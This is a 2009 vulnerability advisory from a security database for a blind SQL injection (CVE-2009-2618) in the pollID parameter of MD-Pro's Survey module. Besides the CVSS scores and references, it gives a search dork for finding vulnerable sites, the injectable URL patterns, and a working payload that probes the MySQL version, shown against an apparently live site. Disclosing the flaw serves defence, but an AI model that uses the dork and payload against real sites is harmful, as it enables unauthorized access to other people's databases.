MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection Vulnerability

2009.07.28
Credit: XaDoS
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-2618
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[!]Information_schema: [Product: MDPro v 1.083.x ] [site: www.maxdev.com ] [Vuln: Blind $QL Injection (pollID) ] [Author: XaDoS ~ thanks to S3rg3770 ] [dork: inurl:modules.php?op= "pollID"] [ "Powered By MDPro" ] [~] Vuln: (PollID) http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL] or http://www.site.com/[MDPro_path]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=[SQL] [~] DeMo: For example, if yuo want see the version of MySql write: http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5# Like: http://www.xxx.it/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=73+and+substring(@@version,1,1)=5# [work] so v => 5.0.0 (this site have 96 databases) :) [~] Note: If yuo want exploit for this vuln write it by yuorself. I'm really Busy. thanks to s3rg3770 and warwolfz Crew \*Everything that gives pleasure has its reason. To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire Have Fun :D

References:

http://xforce.iss.net/xforce/xfdb/51385
http://www.securityfocus.com/bid/35495
http://www.milw0rm.com/exploits/9021


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top